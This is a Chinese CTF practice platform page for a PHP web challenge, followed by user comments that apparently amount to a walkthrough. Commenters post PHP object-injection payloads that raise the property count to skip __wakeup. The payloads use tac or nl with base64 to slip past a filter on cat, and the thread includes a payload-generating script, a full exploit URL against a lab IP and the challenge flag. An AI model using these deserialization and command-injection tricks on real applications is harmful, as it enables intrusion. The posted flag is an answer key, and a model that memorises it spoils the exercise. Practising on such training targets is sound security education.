安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1775
提  示:
描  述:
flag{}
评论
Bojing 3月前

有哪里提示了username是admin的吗

回复 0
numberone 1月前

源代码里不是有个if语句:if ($this->username === 'admin')

回复 0

18956160518 4月前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

EtHat 7月前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 9月前

nl flag.php|base64

回复 0

不会编程的崽 10月前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 10月前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 1年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 1年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 1年前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 1年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

wangjf 攻破了该题 1小时前
ほしの) アイ 攻破了该题 3小时前
zayxshawn 攻破了该题 2天前
死在回忆里 攻破了该题 5天前
xxxx3803 攻破了该题 8天前
森屿暖阳 攻破了该题 10天前
19554517129 攻破了该题 10天前
Lixxxxxir 攻破了该题 10天前
zy20041008 攻破了该题 10天前
abc_ 攻破了该题 10天前
18315400384 攻破了该题 10天前
1665487923 攻破了该题 10天前
2662212567 攻破了该题 10天前
eren 攻破了该题 10天前
wkb123456 攻破了该题 10天前
3294055740 攻破了该题 10天前
killminebug 攻破了该题 10天前
wwt111 攻破了该题 10天前
15762905283 攻破了该题 10天前
丁asdf 攻破了该题 10天前